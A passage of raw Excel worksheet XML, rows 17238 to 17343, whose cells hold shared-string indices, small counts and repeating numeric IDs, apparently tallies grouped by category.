      <c r="C17238">
        <v>0</v>
      </c>
      <c r="D17238">
        <v>2204</v>
      </c>
    </row>
    <row r="17239" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17239" t="s">
        <v>16231</v>
      </c>
      <c r="B17239" t="s">
        <v>16212</v>
      </c>
      <c r="C17239">
        <v>0</v>
      </c>
      <c r="D17239">
        <v>2204</v>
      </c>
    </row>
    <row r="17240" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17240" t="s">
        <v>16228</v>
      </c>
      <c r="B17240" t="s">
        <v>16213</v>
      </c>
      <c r="C17240">
        <v>0</v>
      </c>
      <c r="D17240">
        <v>2204</v>
      </c>
    </row>
    <row r="17241" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17241" t="s">
        <v>16231</v>
      </c>
      <c r="B17241" t="s">
        <v>16214</v>
      </c>
      <c r="C17241">
        <v>0</v>
      </c>
      <c r="D17241">
        <v>2204</v>
      </c>
    </row>
    <row r="17242" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17242" t="s">
        <v>16228</v>
      </c>
      <c r="B17242" t="s">
        <v>16215</v>
      </c>
      <c r="C17242">
        <v>0</v>
      </c>
      <c r="D17242">
        <v>2204</v>
      </c>
    </row>
    <row r="17243" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17243" t="s">
        <v>16231</v>
      </c>
      <c r="B17243" t="s">
        <v>16216</v>
      </c>
      <c r="C17243">
        <v>10</v>
      </c>
      <c r="D17243">
        <v>2204</v>
      </c>
    </row>
    <row r="17244" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17244" t="s">
        <v>16228</v>
      </c>
      <c r="B17244" t="s">
        <v>16217</v>
      </c>
      <c r="C17244">
        <v>0</v>
      </c>
      <c r="D17244">
        <v>2204</v>
      </c>
    </row>
    <row r="17245" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17245" t="s">
        <v>16231</v>
      </c>
      <c r="B17245" t="s">
        <v>16218</v>
      </c>
      <c r="C17245">
        <v>10</v>
      </c>
      <c r="D17245">
        <v>2204</v>
      </c>
    </row>
    <row r="17246" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17246" t="s">
        <v>16229</v>
      </c>
      <c r="B17246" t="s">
        <v>16219</v>
      </c>
      <c r="C17246">
        <v>0</v>
      </c>
      <c r="D17246">
        <v>2204</v>
      </c>
    </row>
    <row r="17247" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17247" t="s">
        <v>16230</v>
      </c>
      <c r="B17247" t="s">
        <v>16220</v>
      </c>
      <c r="C17247">
        <v>0</v>
      </c>
      <c r="D17247">
        <v>2204</v>
      </c>
    </row>
    <row r="17248" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17248" t="s">
        <v>16229</v>
      </c>
      <c r="B17248" t="s">
        <v>16221</v>
      </c>
      <c r="C17248">
        <v>0</v>
      </c>
      <c r="D17248">
        <v>2204</v>
      </c>
    </row>
    <row r="17249" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17249" t="s">
        <v>16230</v>
      </c>
      <c r="B17249" t="s">
        <v>16222</v>
      </c>
      <c r="C17249">
        <v>0</v>
      </c>
      <c r="D17249">
        <v>2204</v>
      </c>
    </row>
    <row r="17250" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17250" t="s">
        <v>16223</v>
      </c>
      <c r="B17250" t="s">
        <v>16223</v>
      </c>
      <c r="C17250">
        <v>0</v>
      </c>
      <c r="D17250">
        <v>2204</v>
      </c>
    </row>
    <row r="17251" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17251" t="s">
        <v>16224</v>
      </c>
      <c r="B17251" t="s">
        <v>16224</v>
      </c>
      <c r="C17251">
        <v>0</v>
      </c>
      <c r="D17251">
        <v>2204</v>
      </c>
    </row>
    <row r="17252" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17252" t="s">
        <v>16228</v>
      </c>
      <c r="B17252" t="s">
        <v>16211</v>
      </c>
      <c r="C17252">
        <v>0</v>
      </c>
      <c r="D17252">
        <v>5322</v>
      </c>
    </row>
    <row r="17253" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17253" t="s">
        <v>16231</v>
      </c>
      <c r="B17253" t="s">
        <v>16212</v>
      </c>
      <c r="C17253">
        <v>0</v>
      </c>
      <c r="D17253">
        <v>5322</v>
      </c>
    </row>
    <row r="17254" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17254" t="s">
        <v>16228</v>
      </c>
      <c r="B17254" t="s">
        <v>16213</v>
      </c>
      <c r="C17254">
        <v>0</v>
      </c>
      <c r="D17254">
        <v>5322</v>
      </c>
    </row>
    <row r="17255" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17255" t="s">
        <v>16231</v>
      </c>
      <c r="B17255" t="s">
        <v>16214</v>
      </c>
      <c r="C17255">
        <v>0</v>
      </c>
      <c r="D17255">
        <v>5322</v>
      </c>
    </row>
    <row r="17256" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17256" t="s">
        <v>16228</v>
      </c>
      <c r="B17256" t="s">
        <v>16215</v>
      </c>
      <c r="C17256">
        <v>0</v>
      </c>
      <c r="D17256">
        <v>5322</v>
      </c>
    </row>
    <row r="17257" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17257" t="s">
        <v>16231</v>
      </c>
      <c r="B17257" t="s">
        <v>16216</v>
      </c>
      <c r="C17257">
        <v>0</v>
      </c>
      <c r="D17257">
        <v>5322</v>
      </c>
    </row>
    <row r="17258" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17258" t="s">
        <v>16228</v>
      </c>
      <c r="B17258" t="s">
        <v>16217</v>
      </c>
      <c r="C17258">
        <v>0</v>
      </c>
      <c r="D17258">
        <v>5322</v>
      </c>
    </row>
    <row r="17259" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17259" t="s">
        <v>16231</v>
      </c>
      <c r="B17259" t="s">
        <v>16218</v>
      </c>
      <c r="C17259">
        <v>0</v>
      </c>
      <c r="D17259">
        <v>5322</v>
      </c>
    </row>
    <row r="17260" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17260" t="s">
        <v>16229</v>
      </c>
      <c r="B17260" t="s">
        <v>16219</v>
      </c>
      <c r="C17260">
        <v>0</v>
      </c>
      <c r="D17260">
        <v>5322</v>
      </c>
    </row>
    <row r="17261" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17261" t="s">
        <v>16230</v>
      </c>
      <c r="B17261" t="s">
        <v>16220</v>
      </c>
      <c r="C17261">
        <v>0</v>
      </c>
      <c r="D17261">
        <v>5322</v>
      </c>
    </row>
    <row r="17262" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17262" t="s">
        <v>16229</v>
      </c>
      <c r="B17262" t="s">
        <v>16221</v>
      </c>
      <c r="C17262">
        <v>1</v>
      </c>
      <c r="D17262">
        <v>5322</v>
      </c>
    </row>
    <row r="17263" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17263" t="s">
        <v>16230</v>
      </c>
      <c r="B17263" t="s">
        <v>16222</v>
      </c>
      <c r="C17263">
        <v>0</v>
      </c>
      <c r="D17263">
        <v>5322</v>
      </c>
    </row>
    <row r="17264" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17264" t="s">
        <v>16223</v>
      </c>
      <c r="B17264" t="s">
        <v>16223</v>
      </c>
      <c r="C17264">
        <v>24</v>
      </c>
      <c r="D17264">
        <v>5322</v>
      </c>
    </row>
    <row r="17265" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17265" t="s">
        <v>16224</v>
      </c>
      <c r="B17265" t="s">
        <v>16224</v>
      </c>
      <c r="C17265">
        <v>1</v>
      </c>
      <c r="D17265">
        <v>5322</v>
      </c>
    </row>
    <row r="17266" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17266" t="s">
        <v>16228</v>
      </c>
      <c r="B17266" t="s">
        <v>16211</v>
      </c>
      <c r="C17266">
        <v>0</v>
      </c>
      <c r="D17266">
        <v>5461</v>
      </c>
    </row>
    <row r="17267" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17267" t="s">
        <v>16231</v>
      </c>
      <c r="B17267" t="s">
        <v>16212</v>
      </c>
      <c r="C17267">
        <v>0</v>
      </c>
      <c r="D17267">
        <v>5461</v>
      </c>
    </row>
    <row r="17268" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17268" t="s">
        <v>16228</v>
      </c>
      <c r="B17268" t="s">
        <v>16213</v>
      </c>
      <c r="C17268">
        <v>0</v>
      </c>
      <c r="D17268">
        <v>5461</v>
      </c>
    </row>
    <row r="17269" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17269" t="s">
        <v>16231</v>
      </c>
      <c r="B17269" t="s">
        <v>16214</v>
      </c>
      <c r="C17269">
        <v>0</v>
      </c>
      <c r="D17269">
        <v>5461</v>
      </c>
    </row>
    <row r="17270" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17270" t="s">
        <v>16228</v>
      </c>
      <c r="B17270" t="s">
        <v>16215</v>
      </c>
      <c r="C17270">
        <v>1</v>
      </c>
      <c r="D17270">
        <v>5461</v>
      </c>
    </row>
    <row r="17271" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17271" t="s">
        <v>16231</v>
      </c>
      <c r="B17271" t="s">
        <v>16216</v>
      </c>
      <c r="C17271">
        <v>1</v>
      </c>
      <c r="D17271">
        <v>5461</v>
      </c>
    </row>
    <row r="17272" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17272" t="s">
        <v>16228</v>
      </c>
      <c r="B17272" t="s">
        <v>16217</v>
      </c>
      <c r="C17272">
        <v>0</v>
      </c>
      <c r="D17272">
        <v>5461</v>
      </c>
    </row>
    <row r="17273" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17273" t="s">
        <v>16231</v>
      </c>
      <c r="B17273" t="s">
        <v>16218</v>
      </c>
      <c r="C17273">
        <v>0</v>
      </c>
      <c r="D17273">
        <v>5461</v>
      </c>
    </row>
    <row r="17274" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17274" t="s">
        <v>16229</v>
      </c>
      <c r="B17274" t="s">
        <v>16219</v>
      </c>
      <c r="C17274">
        <v>0</v>
      </c>
      <c r="D17274">
        <v>5461</v>
      </c>
    </row>
    <row r="17275" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17275" t="s">
        <v>16230</v>
      </c>
      <c r="B17275" t="s">
        <v>16220</v>
      </c>
      <c r="C17275">
        <v>0</v>
      </c>
      <c r="D17275">
        <v>5461</v>
      </c>
    </row>
    <row r="17276" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17276" t="s">
        <v>16229</v>
      </c>
      <c r="B17276" t="s">
        <v>16221</v>
      </c>
      <c r="C17276">
        <v>0</v>
      </c>
      <c r="D17276">
        <v>5461</v>
      </c>
    </row>
    <row r="17277" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17277" t="s">
        <v>16230</v>
      </c>
      <c r="B17277" t="s">
        <v>16222</v>
      </c>
      <c r="C17277">
        <v>0</v>
      </c>
      <c r="D17277">
        <v>5461</v>
      </c>
    </row>
    <row r="17278" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17278" t="s">
        <v>16223</v>
      </c>
      <c r="B17278" t="s">
        <v>16223</v>
      </c>
      <c r="C17278">
        <v>30</v>
      </c>
      <c r="D17278">
        <v>5461</v>
      </c>
    </row>
    <row r="17279" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17279" t="s">
        <v>16224</v>
      </c>
      <c r="B17279" t="s">
        <v>16224</v>
      </c>
      <c r="C17279">
        <v>30</v>
      </c>
      <c r="D17279">
        <v>5461</v>
      </c>
    </row>
    <row r="17280" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17280" t="s">
        <v>16228</v>
      </c>
      <c r="B17280" t="s">
        <v>16211</v>
      </c>
      <c r="C17280">
        <v>0</v>
      </c>
      <c r="D17280">
        <v>1699</v>
      </c>
    </row>
    <row r="17281" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17281" t="s">
        <v>16231</v>
      </c>
      <c r="B17281" t="s">
        <v>16212</v>
      </c>
      <c r="C17281">
        <v>0</v>
      </c>
      <c r="D17281">
        <v>1699</v>
      </c>
    </row>
    <row r="17282" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17282" t="s">
        <v>16228</v>
      </c>
      <c r="B17282" t="s">
        <v>16213</v>
      </c>
      <c r="C17282">
        <v>0</v>
      </c>
      <c r="D17282">
        <v>1699</v>
      </c>
    </row>
    <row r="17283" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17283" t="s">
        <v>16231</v>
      </c>
      <c r="B17283" t="s">
        <v>16214</v>
      </c>
      <c r="C17283">
        <v>0</v>
      </c>
      <c r="D17283">
        <v>1699</v>
      </c>
    </row>
    <row r="17284" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17284" t="s">
        <v>16228</v>
      </c>
      <c r="B17284" t="s">
        <v>16215</v>
      </c>
      <c r="C17284">
        <v>7</v>
      </c>
      <c r="D17284">
        <v>1699</v>
      </c>
    </row>
    <row r="17285" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17285" t="s">
        <v>16231</v>
      </c>
      <c r="B17285" t="s">
        <v>16216</v>
      </c>
      <c r="C17285">
        <v>4</v>
      </c>
      <c r="D17285">
        <v>1699</v>
      </c>
    </row>
    <row r="17286" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17286" t="s">
        <v>16228</v>
      </c>
      <c r="B17286" t="s">
        <v>16217</v>
      </c>
      <c r="C17286">
        <v>11</v>
      </c>
      <c r="D17286">
        <v>1699</v>
      </c>
    </row>
    <row r="17287" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17287" t="s">
        <v>16231</v>
      </c>
      <c r="B17287" t="s">
        <v>16218</v>
      </c>
      <c r="C17287">
        <v>25</v>
      </c>
      <c r="D17287">
        <v>1699</v>
      </c>
    </row>
    <row r="17288" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17288" t="s">
        <v>16229</v>
      </c>
      <c r="B17288" t="s">
        <v>16219</v>
      </c>
      <c r="C17288">
        <v>3</v>
      </c>
      <c r="D17288">
        <v>1699</v>
      </c>
    </row>
    <row r="17289" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17289" t="s">
        <v>16230</v>
      </c>
      <c r="B17289" t="s">
        <v>16220</v>
      </c>
      <c r="C17289">
        <v>0</v>
      </c>
      <c r="D17289">
        <v>1699</v>
      </c>
    </row>
    <row r="17290" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17290" t="s">
        <v>16229</v>
      </c>
      <c r="B17290" t="s">
        <v>16221</v>
      </c>
      <c r="C17290">
        <v>0</v>
      </c>
      <c r="D17290">
        <v>1699</v>
      </c>
    </row>
    <row r="17291" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17291" t="s">
        <v>16230</v>
      </c>
      <c r="B17291" t="s">
        <v>16222</v>
      </c>
      <c r="C17291">
        <v>0</v>
      </c>
      <c r="D17291">
        <v>1699</v>
      </c>
    </row>
    <row r="17292" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17292" t="s">
        <v>16223</v>
      </c>
      <c r="B17292" t="s">
        <v>16223</v>
      </c>
      <c r="C17292">
        <v>25</v>
      </c>
      <c r="D17292">
        <v>1699</v>
      </c>
    </row>
    <row r="17293" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17293" t="s">
        <v>16224</v>
      </c>
      <c r="B17293" t="s">
        <v>16224</v>
      </c>
      <c r="C17293">
        <v>1</v>
      </c>
      <c r="D17293">
        <v>1699</v>
      </c>
    </row>
    <row r="17294" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17294" t="s">
        <v>16228</v>
      </c>
      <c r="B17294" t="s">
        <v>16215</v>
      </c>
      <c r="C17294">
        <v>0</v>
      </c>
      <c r="D17294">
        <v>29</v>
      </c>
    </row>
    <row r="17295" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17295" t="s">
        <v>16228</v>
      </c>
      <c r="B17295" t="s">
        <v>16217</v>
      </c>
      <c r="C17295">
        <v>3</v>
      </c>
      <c r="D17295">
        <v>29</v>
      </c>
    </row>
    <row r="17296" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17296" t="s">
        <v>16228</v>
      </c>
      <c r="B17296" t="s">
        <v>16211</v>
      </c>
      <c r="C17296">
        <v>0</v>
      </c>
      <c r="D17296">
        <v>5454</v>
      </c>
    </row>
    <row r="17297" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17297" t="s">
        <v>16231</v>
      </c>
      <c r="B17297" t="s">
        <v>16212</v>
      </c>
      <c r="C17297">
        <v>0</v>
      </c>
      <c r="D17297">
        <v>5454</v>
      </c>
    </row>
    <row r="17298" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17298" t="s">
        <v>16228</v>
      </c>
      <c r="B17298" t="s">
        <v>16213</v>
      </c>
      <c r="C17298">
        <v>0</v>
      </c>
      <c r="D17298">
        <v>5454</v>
      </c>
    </row>
    <row r="17299" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17299" t="s">
        <v>16231</v>
      </c>
      <c r="B17299" t="s">
        <v>16214</v>
      </c>
      <c r="C17299">
        <v>0</v>
      </c>
      <c r="D17299">
        <v>5454</v>
      </c>
    </row>
    <row r="17300" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17300" t="s">
        <v>16228</v>
      </c>
      <c r="B17300" t="s">
        <v>16215</v>
      </c>
      <c r="C17300">
        <v>6</v>
      </c>
      <c r="D17300">
        <v>5454</v>
      </c>
    </row>
    <row r="17301" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17301" t="s">
        <v>16231</v>
      </c>
      <c r="B17301" t="s">
        <v>16216</v>
      </c>
      <c r="C17301">
        <v>2</v>
      </c>
      <c r="D17301">
        <v>5454</v>
      </c>
    </row>
    <row r="17302" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17302" t="s">
        <v>16228</v>
      </c>
      <c r="B17302" t="s">
        <v>16217</v>
      </c>
      <c r="C17302">
        <v>2</v>
      </c>
      <c r="D17302">
        <v>5454</v>
      </c>
    </row>
    <row r="17303" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17303" t="s">
        <v>16231</v>
      </c>
      <c r="B17303" t="s">
        <v>16218</v>
      </c>
      <c r="C17303">
        <v>2</v>
      </c>
      <c r="D17303">
        <v>5454</v>
      </c>
    </row>
    <row r="17304" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17304" t="s">
        <v>16229</v>
      </c>
      <c r="B17304" t="s">
        <v>16219</v>
      </c>
      <c r="C17304">
        <v>15</v>
      </c>
      <c r="D17304">
        <v>5454</v>
      </c>
    </row>
    <row r="17305" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17305" t="s">
        <v>16230</v>
      </c>
      <c r="B17305" t="s">
        <v>16220</v>
      </c>
      <c r="C17305">
        <v>0</v>
      </c>
      <c r="D17305">
        <v>5454</v>
      </c>
    </row>
    <row r="17306" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17306" t="s">
        <v>16229</v>
      </c>
      <c r="B17306" t="s">
        <v>16221</v>
      </c>
      <c r="C17306">
        <v>3</v>
      </c>
      <c r="D17306">
        <v>5454</v>
      </c>
    </row>
    <row r="17307" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17307" t="s">
        <v>16230</v>
      </c>
      <c r="B17307" t="s">
        <v>16222</v>
      </c>
      <c r="C17307">
        <v>2</v>
      </c>
      <c r="D17307">
        <v>5454</v>
      </c>
    </row>
    <row r="17308" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17308" t="s">
        <v>16223</v>
      </c>
      <c r="B17308" t="s">
        <v>16223</v>
      </c>
      <c r="C17308">
        <v>26</v>
      </c>
      <c r="D17308">
        <v>5454</v>
      </c>
    </row>
    <row r="17309" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17309" t="s">
        <v>16224</v>
      </c>
      <c r="B17309" t="s">
        <v>16224</v>
      </c>
      <c r="C17309">
        <v>1</v>
      </c>
      <c r="D17309">
        <v>5454</v>
      </c>
    </row>
    <row r="17310" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17310" t="s">
        <v>16228</v>
      </c>
      <c r="B17310" t="s">
        <v>16211</v>
      </c>
      <c r="C17310">
        <v>0</v>
      </c>
      <c r="D17310">
        <v>801</v>
      </c>
    </row>
    <row r="17311" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17311" t="s">
        <v>16231</v>
      </c>
      <c r="B17311" t="s">
        <v>16212</v>
      </c>
      <c r="C17311">
        <v>0</v>
      </c>
      <c r="D17311">
        <v>801</v>
      </c>
    </row>
    <row r="17312" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17312" t="s">
        <v>16228</v>
      </c>
      <c r="B17312" t="s">
        <v>16213</v>
      </c>
      <c r="C17312">
        <v>0</v>
      </c>
      <c r="D17312">
        <v>801</v>
      </c>
    </row>
    <row r="17313" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17313" t="s">
        <v>16231</v>
      </c>
      <c r="B17313" t="s">
        <v>16214</v>
      </c>
      <c r="C17313">
        <v>0</v>
      </c>
      <c r="D17313">
        <v>801</v>
      </c>
    </row>
    <row r="17314" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17314" t="s">
        <v>16228</v>
      </c>
      <c r="B17314" t="s">
        <v>16215</v>
      </c>
      <c r="C17314">
        <v>0</v>
      </c>
      <c r="D17314">
        <v>801</v>
      </c>
    </row>
    <row r="17315" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17315" t="s">
        <v>16231</v>
      </c>
      <c r="B17315" t="s">
        <v>16216</v>
      </c>
      <c r="C17315">
        <v>1</v>
      </c>
      <c r="D17315">
        <v>801</v>
      </c>
    </row>
    <row r="17316" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17316" t="s">
        <v>16228</v>
      </c>
      <c r="B17316" t="s">
        <v>16217</v>
      </c>
      <c r="C17316">
        <v>1</v>
      </c>
      <c r="D17316">
        <v>801</v>
      </c>
    </row>
    <row r="17317" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17317" t="s">
        <v>16231</v>
      </c>
      <c r="B17317" t="s">
        <v>16218</v>
      </c>
      <c r="C17317">
        <v>0</v>
      </c>
      <c r="D17317">
        <v>801</v>
      </c>
    </row>
    <row r="17318" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17318" t="s">
        <v>16229</v>
      </c>
      <c r="B17318" t="s">
        <v>16219</v>
      </c>
      <c r="C17318">
        <v>0</v>
      </c>
      <c r="D17318">
        <v>801</v>
      </c>
    </row>
    <row r="17319" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17319" t="s">
        <v>16230</v>
      </c>
      <c r="B17319" t="s">
        <v>16220</v>
      </c>
      <c r="C17319">
        <v>0</v>
      </c>
      <c r="D17319">
        <v>801</v>
      </c>
    </row>
    <row r="17320" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17320" t="s">
        <v>16229</v>
      </c>
      <c r="B17320" t="s">
        <v>16221</v>
      </c>
      <c r="C17320">
        <v>0</v>
      </c>
      <c r="D17320">
        <v>801</v>
      </c>
    </row>
    <row r="17321" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17321" t="s">
        <v>16230</v>
      </c>
      <c r="B17321" t="s">
        <v>16222</v>
      </c>
      <c r="C17321">
        <v>3</v>
      </c>
      <c r="D17321">
        <v>801</v>
      </c>
    </row>
    <row r="17322" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17322" t="s">
        <v>16223</v>
      </c>
      <c r="B17322" t="s">
        <v>16223</v>
      </c>
      <c r="C17322">
        <v>6</v>
      </c>
      <c r="D17322">
        <v>801</v>
      </c>
    </row>
    <row r="17323" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17323" t="s">
        <v>16224</v>
      </c>
      <c r="B17323" t="s">
        <v>16224</v>
      </c>
      <c r="C17323">
        <v>1</v>
      </c>
      <c r="D17323">
        <v>801</v>
      </c>
    </row>
    <row r="17324" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17324" t="s">
        <v>16228</v>
      </c>
      <c r="B17324" t="s">
        <v>16211</v>
      </c>
      <c r="C17324">
        <v>0</v>
      </c>
      <c r="D17324">
        <v>1542</v>
      </c>
    </row>
    <row r="17325" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17325" t="s">
        <v>16231</v>
      </c>
      <c r="B17325" t="s">
        <v>16212</v>
      </c>
      <c r="C17325">
        <v>0</v>
      </c>
      <c r="D17325">
        <v>1542</v>
      </c>
    </row>
    <row r="17326" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17326" t="s">
        <v>16228</v>
      </c>
      <c r="B17326" t="s">
        <v>16213</v>
      </c>
      <c r="C17326">
        <v>0</v>
      </c>
      <c r="D17326">
        <v>1542</v>
      </c>
    </row>
    <row r="17327" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17327" t="s">
        <v>16231</v>
      </c>
      <c r="B17327" t="s">
        <v>16214</v>
      </c>
      <c r="C17327">
        <v>0</v>
      </c>
      <c r="D17327">
        <v>1542</v>
      </c>
    </row>
    <row r="17328" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17328" t="s">
        <v>16228</v>
      </c>
      <c r="B17328" t="s">
        <v>16215</v>
      </c>
      <c r="C17328">
        <v>0</v>
      </c>
      <c r="D17328">
        <v>1542</v>
      </c>
    </row>
    <row r="17329" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17329" t="s">
        <v>16231</v>
      </c>
      <c r="B17329" t="s">
        <v>16216</v>
      </c>
      <c r="C17329">
        <v>0</v>
      </c>
      <c r="D17329">
        <v>1542</v>
      </c>
    </row>
    <row r="17330" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17330" t="s">
        <v>16228</v>
      </c>
      <c r="B17330" t="s">
        <v>16217</v>
      </c>
      <c r="C17330">
        <v>3</v>
      </c>
      <c r="D17330">
        <v>1542</v>
      </c>
    </row>
    <row r="17331" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17331" t="s">
        <v>16231</v>
      </c>
      <c r="B17331" t="s">
        <v>16218</v>
      </c>
      <c r="C17331">
        <v>0</v>
      </c>
      <c r="D17331">
        <v>1542</v>
      </c>
    </row>
    <row r="17332" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17332" t="s">
        <v>16229</v>
      </c>
      <c r="B17332" t="s">
        <v>16219</v>
      </c>
      <c r="C17332">
        <v>1</v>
      </c>
      <c r="D17332">
        <v>1542</v>
      </c>
    </row>
    <row r="17333" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17333" t="s">
        <v>16230</v>
      </c>
      <c r="B17333" t="s">
        <v>16220</v>
      </c>
      <c r="C17333">
        <v>0</v>
      </c>
      <c r="D17333">
        <v>1542</v>
      </c>
    </row>
    <row r="17334" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17334" t="s">
        <v>16229</v>
      </c>
      <c r="B17334" t="s">
        <v>16221</v>
      </c>
      <c r="C17334">
        <v>5</v>
      </c>
      <c r="D17334">
        <v>1542</v>
      </c>
    </row>
    <row r="17335" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17335" t="s">
        <v>16230</v>
      </c>
      <c r="B17335" t="s">
        <v>16222</v>
      </c>
      <c r="C17335">
        <v>0</v>
      </c>
      <c r="D17335">
        <v>1542</v>
      </c>
    </row>
    <row r="17336" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17336" t="s">
        <v>16223</v>
      </c>
      <c r="B17336" t="s">
        <v>16223</v>
      </c>
      <c r="C17336">
        <v>6</v>
      </c>
      <c r="D17336">
        <v>1542</v>
      </c>
    </row>
    <row r="17337" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17337" t="s">
        <v>16224</v>
      </c>
      <c r="B17337" t="s">
        <v>16224</v>
      </c>
      <c r="C17337">
        <v>0</v>
      </c>
      <c r="D17337">
        <v>1542</v>
      </c>
    </row>
    <row r="17338" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17338" t="s">
        <v>16228</v>
      </c>
      <c r="B17338" t="s">
        <v>16211</v>
      </c>
      <c r="C17338">
        <v>0</v>
      </c>
      <c r="D17338">
        <v>1595</v>
      </c>
    </row>
    <row r="17339" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17339" t="s">
        <v>16231</v>
      </c>
      <c r="B17339" t="s">
        <v>16212</v>
      </c>
      <c r="C17339">
        <v>2</v>
      </c>
      <c r="D17339">
        <v>1595</v>
      </c>
    </row>
    <row r="17340" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17340" t="s">
        <v>16228</v>
      </c>
      <c r="B17340" t="s">
        <v>16213</v>
      </c>
      <c r="C17340">
        <v>2</v>
      </c>
      <c r="D17340">
        <v>1595</v>
      </c>
    </row>
    <row r="17341" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17341" t="s">
        <v>16231</v>
      </c>
      <c r="B17341" t="s">
        <v>16214</v>
      </c>
      <c r="C17341">
        <v>40</v>
      </c>
      <c r="D17341">
        <v>1595</v>
      </c>
    </row>
    <row r="17342" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17342" t="s">
        <v>16228</v>
      </c>
      <c r="B17342" t="s">
        <v>16215</v>
      </c>
      <c r="C17342">
        <v>0</v>
      </c>
      <c r="D17342">
        <v>1595</v>
      </c>
    </row>
    <row r="17343" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17343" t="s">
        <v>16231</v>
      </c>
      <c r="B17343" t="s">
        <v>16216</v>
      </c>
